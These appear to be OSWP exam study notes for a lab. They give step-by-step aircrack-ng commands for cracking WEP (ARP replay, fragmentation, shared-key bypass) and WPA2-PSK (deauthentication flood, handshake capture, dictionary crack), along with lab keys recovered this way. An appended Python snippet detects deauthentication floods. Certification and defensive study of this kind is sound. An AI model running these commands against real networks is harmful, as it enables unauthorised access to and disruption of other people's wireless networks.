---
title: Prepared OSWP offsec
tags: CTF
---

### wep

```
sudo airmon-ng start wlan0mon
sudo airodump-ng -c 3 --bssid F0:9F:C2:71:22:11 -w wep.cap wlan0mon
sudo aireplay-ng -1 3600 -q 10 -a F0:9F:C2:71:22:11 wlan0mon
sudo aireplay-ng --arpreplay -b F0:9F:C2:71:22:11 -h 02:00:00:00:00:00 wlan0mon
nano wep.conf
```

wep.conf:

```
network={
    ssid="wifi-old"
    key_mgmt=NONE
    wep_key0=11BB33CD55
    wep_tx_keyidx=0
}
```

```
sudo wpa_supplicant -i wlan2 -c wep.conf
dhclient wlan2 -v
curl http://192.168.1.1/proof.txt
```

### WPA2/PSK

```
sudo airmon-ng check kill
sudo airmon-ng start wlan0
sudo airodump-ng wlan0mon
sudo airodump-ng --bssid F0:9F:C2:71:22:12 -c 6 -w wpa wlan0mon
sudo aireplay-ng --deauth 0 -a F0:9F:C2:71:22:12 wlan0mon
sudo aircrack-ng wpa.pcap -w rockyou.txt
nano psk.conf
```

psk.conf:

```
network={
    ssid="wifi-mobile"
    psk="starwars1"
    scan_ssid=1
    key_mgmt=WPA-PSK
    proto=WPA2
}
```

```
wpa_supplicant -i wlan3 -c psk.conf
dhclient wlan3 -v
curl http://192.168.1.1/proof.txt
```

### WPA2/MGT

Reference: https://r4ulcl.com/posts/walkthrough-wifichallenge-lab-2.0/#07-get-wifi-old-password

```
sudo ip link set wlan0 down
sudo iw dev wlan0 set type monitor
sudo ip link set wlan0 up
ifconfig
ip link show
```

Output of `ip link show`:

```
3: mon0: <BROADCAST,MULTICAST> mtu 1500 qdisc noop state DOWN mode DEFAULT group default qlen 1000
    link/ether 12:34:56:78:9a:bc brd ff:ff:ff:ff:ff:ff
```

mac = 00:15:5d:9c:e4:ed

### WEP / Clientless / Fragmentation Attack

ACCESS POINT MAC: 1C:7E:E5:41:E5:CB

Controls & Pre-Attack Steps:

```
root@bt ifconfig
root@bt iwconfig
root@bt airmon-ng check kill
root@bt airmon-ng start wlan0
root@bt airodump-ng mon0
```

Attack Steps:

```
root@bt airodump-ng --channel 3 --bssid 1C:7E:E5:41:E5:CB --write stage-1 mon0
(sudo airodump-ng -c 3 --bssid F0:9F:C2:71:22:11 -w stage1 wlan0mon)
sudo aireplay-ng -1 0 -e 'stage1' -a F0:9F:C2:71:22:11 -h 08:00:27:2c:26:22 wlan0mon
root@bt aireplay-ng -5 -b 1C:7E:E5:41:E5:CB -h Your_MAC mon0      # no client
root@bt packetforge-ng -0 -a 1C:7E:E5:41:E5:CB -h Your_MAC -l Your_IP -k 192.168.x.255 -y file_name.xor -w New_File_Name
```

example:

```
packetforge-ng -0 -a 1C:7E:E5:41:E5:CB -h 00:c0:ca:36:22:9e -l 192.168.1.101 -k 192.168.1.255 -y fragment-0209-121548.xor -w Stage1
```

```
root@bt aireplay-ng -2 -r New_File_Name mon0
```

example:

```
sudo aireplay-ng -2 -r stage1 wlan0mon
```

wait until … and see frames

```
root@bt aircrack-ng stage-1-01.cap
(aircrack-ng -0 Stage1-01.cap)
```

### WEP / Connected Client / Bypassing WEP Shared Key

ACCESS POINT MAC: 00:14:D1:E1:C7:62
CLIENT MAC: 00:02:72:8E:19:5E

Controls & Pre-Attack Steps:

```
root@bt ifconfig
root@bt iwconfig
root@bt airmon-ng check kill
root@bt airmon-ng start wlan0
root@bt airodump-ng mon0
```

Attack Steps:

```
root@bt airodump-ng -c 11 --bssid 00:14:D1:E1:C7:62 mon0 -w Stage2
root@bt aireplay-ng -1 0 -e "STAGE 2" -a 00:14:D1:E1:C7:62 -h 00:c0:ca:36:22:9e mon0
```

it requires the xor file:

```
aireplay-ng -1 0 -e 'STAGE 2' -y Stage2-01-00-14-D1-E1-C7-62.xor -h 00:c0:ca:36:22:9e mon0
```

wait until success

```
aireplay-ng --arpreplay -b 00:14:D1:E1:C7:62 -h 00:c0:ca:36:22:9e mon0
```

back to check airodump-ng

```
root@bt aircrack-ng Stage-2-01.cap -0
```

### WEP / Connected Client / Bypassing WEP Shared Key

```
sudo aireplay-ng -1 0 -e "STAGE 2" -a 00:14:D1:E1:C7:62 -h 00:c0:ca:36:22:9e mon0
aireplay-ng -1 0 -e 'STAGE 2' -y Stage2-01-00-14-D1-E1-C7-62.xor -h 00:c0:ca:36:22:9e mon0
```

(wait until it shows successfully)

```
aireplay-ng --arpreplay -b 00:14:D1:E1:C7:62 -h 00:c0:ca:36:22:9e mon0
aircrack-ng -0 Stage2-01.cap
```

### WPA 2 / Connected Client / Pre-Shared Key Authentication

ACCESS POINT MAC: 00:08:A1:CA:3E:CD
CLIENT MAC: 00:C0:CA:30:F1:91

Controls & Pre-Attack Steps:

```
root@bt ifconfig
root@bt iwconfig
root@bt airmon-ng check kill
root@bt airmon-ng start wlan0
root@bt airodump-ng mon0
```

Attack Steps:

```
root@bt airodump-ng --channel 6 --bssid 00:08:A1:CA:3E:CD --write stage-3 mon0
root@bt aireplay-ng --deauth 5 -a 00:08:A1:CA:3E:CD -c 00:C0:CA:30:F1:91 mon0
(aireplay-ng -0 100 -a 00:08:A1:CA:3E:CD -c 00:c0:ca:30:f1:91 mon0)
root@bt aircrack-ng -w psk-crack-dictionary stage-3-01.cap
```

example:

```
aircrack-ng -0 -w /root/psk-crack-dictionary stagex-01.cap
```

(note: here `-a` is not a MAC argument)

example:

```
sudo aireplay-ng -0 100 -a F0:9F:C2:71:22:12 -c 28:6C:07:6F:F9:43 wlan0mon
```

wordlist: https://github.com/dw0rsec/rockyou.txt/blob/master/rockyou.txt.zip

```
wget https://github.com/dw0rsec/rockyou.txt/raw/master/rockyou.txt.zip -O rockyou.txt.zip
```

### write report

First, we need to know our wireless card name, so I used the `iwconfig` command and found my network card, called wlan0.

Then we need to start monitor mode using this command: `airmon-ng start wlan0`

Then I started to discover all of the networks to get the first stage, channel and BSSID by using this command: `airodump-ng mon0`

Now I have all I need, so let's listen on that network only by using this command: `airodump-ng`

Then I tried a fake authentication with the targeted network using this command, for example: `aireplay-ng -1 0 -e 'STAGE 1' -a 1C:7E:E5:41:E5:CB -h 00:c0:ca:36:22:9e mon0`

https://help.offsec.com/hc/en-us/articles/360046904731-OSWP-Exam-Guide
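As an added, defender-side example that is not part of the original note: the WPA2/PSK handshake capture above depends on a deauthentication flood (`aireplay-ng --deauth 0 -a <bssid>`), and this Python snippet flags such bursts in a stream of management-frame records. The `Frame` record, the sliding-window thresholds and the sample frames (built from the note's AP and client MACs) are my own assumptions and constructed data.

```python
from collections import defaultdict
from dataclasses import dataclass

# 802.11 management-frame subtypes (assumed constants, per the standard).
DEAUTH = 0x0C     # subtype 12: deauthentication
DISASSOC = 0x0A   # subtype 10: disassociation


@dataclass(frozen=True)
class Frame:
    """Minimal management-frame record, e.g. as parsed from a monitor-mode capture."""
    ts: float      # capture timestamp in seconds
    subtype: int   # management subtype
    src: str       # transmitter address (spoofed to the AP's MAC during a flood)
    dst: str       # receiver address; ff:ff:ff:ff:ff:ff is broadcast
    reason: int    # reason code from the frame body


def deauth_bursts(frames, window=1.0, threshold=10):
    """Return {src: peak_count} for every source that sent more than `threshold`
    deauth/disassoc frames inside any `window`-second sliding interval.
    A legitimate AP rarely emits more than a handful per second; a tool-driven
    flood sends dozens in well under a second. Enabling 802.11w (Protected
    Management Frames) makes unprotected frames like these get dropped."""
    per_src = defaultdict(list)
    for f in frames:
        if f.subtype in (DEAUTH, DISASSOC):
            per_src[f.src].append(f.ts)
    flagged = {}
    for src, stamps in per_src.items():
        stamps.sort()
        lo, peak = 0, 0
        for hi, t in enumerate(stamps):
            while t - stamps[lo] > window:   # slide the window's left edge
                lo += 1
            peak = max(peak, hi - lo + 1)
        if peak > threshold:
            flagged[src] = peak
    return flagged


# Constructed sample: 40 broadcast deauths in 0.4 s spoofed from the AP's MAC,
# plus one ordinary deauth from a client leaving the network (reason 3).
AP = "f0:9f:c2:71:22:12"
SAMPLE = [Frame(100.0 + i * 0.01, DEAUTH, AP, "ff:ff:ff:ff:ff:ff", 7) for i in range(40)]
SAMPLE.append(Frame(120.0, DEAUTH, "28:6c:07:6f:f9:43", AP, 3))

if __name__ == "__main__":
    print(deauth_bursts(SAMPLE))  # -> {'f0:9f:c2:71:22:12': 40}
```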